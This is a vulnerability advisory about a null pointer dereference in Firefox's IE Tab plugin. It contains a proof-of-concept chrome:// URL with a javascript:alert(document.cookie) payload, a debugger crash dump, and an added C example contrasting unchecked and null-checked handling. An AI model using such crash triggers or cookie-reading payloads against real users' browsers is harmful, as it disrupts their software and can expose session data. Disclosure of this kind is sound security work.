Firefox (with IETab Plugin) Null Pointer Dereference Bug
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Vendor: Mozilla
Product: Firefox with IE Tab
Tested On: Firefox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction:

IETab (https://addons.mozilla.org/firefox/1419/) is a recently released (April 12, 2006) plugin for Firefox. It is used to browse IE-only sites under Firefox. Guess what?? You can run windowsupdate under Firefox ;-)

Bug Details:

Firefox with IETab installed crashes when the ietab plugin is unable to handle specific javascript: URLs. It appears to be a null pointer dereference: at the faulting instruction eax is 0 and the plugin reads through it. For more details refer to the PoC section.

Proof-of-Concept:

Copy & paste the following URL into the Firefox address bar and press enter:

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.

Register details after the crash:

(1e4.3e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]                 ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]                 ds:0023:00000000=????

For more vulnerabilities: http://hackingspirits.com/vuln-rnd/vuln-rnd.html

Credits: Debasis Mohanty (aka Tr0y)
www.hackingspirits.com
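The crash dump above shows a 16-bit read through eax while eax is 0, the classic shape of a handler that trusts a resolver's return value for a scheme it cannot handle. The following added example (constructed for this write-up, not IETab's code; resolve_url, first_host_char_unsafe and first_host_char_safe are hypothetical names) models that pattern and the null check that turns the fault into a reported error.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of a plugin's URL resolver: for http/https it fills a
 * UTF-16 host buffer and returns a pointer to it; for any other scheme
 * (e.g. the javascript: URL in the PoC) it returns NULL. Constructed for
 * illustration only. */
typedef struct { uint16_t host[64]; } resolved_url;

static resolved_url g_resolved;  /* static storage for the last result */

resolved_url *resolve_url(const char *url) {
    const char *rest;
    if (strncmp(url, "http://", 7) == 0)       rest = url + 7;
    else if (strncmp(url, "https://", 8) == 0) rest = url + 8;
    else return NULL;  /* unsupported scheme: nothing to resolve */

    size_t i = 0;
    for (; rest[i] != '\0' && rest[i] != '/' && i < 63; i++)
        g_resolved.host[i] = (uint16_t)(unsigned char)rest[i];
    g_resolved.host[i] = 0;
    return &g_resolved;
}

/* Vulnerable pattern: the caller assumes resolution succeeded. With a
 * javascript: URL r is NULL and the 16-bit load below is the same kind of
 * fault the dump shows (mov dx,[eax] with eax=0). Defined for comparison,
 * deliberately never called. */
uint16_t first_host_char_unsafe(const char *url) {
    resolved_url *r = resolve_url(url);
    return r->host[0];
}

/* Hardened pattern: check the result and report failure instead of
 * dereferencing. Returns 0 on success, -1 for an unsupported URL. */
int first_host_char_safe(const char *url, uint16_t *out) {
    resolved_url *r = resolve_url(url);
    if (r == NULL)
        return -1;  /* unsupported scheme: refuse to proceed */
    *out = r->host[0];
    return 0;
}
```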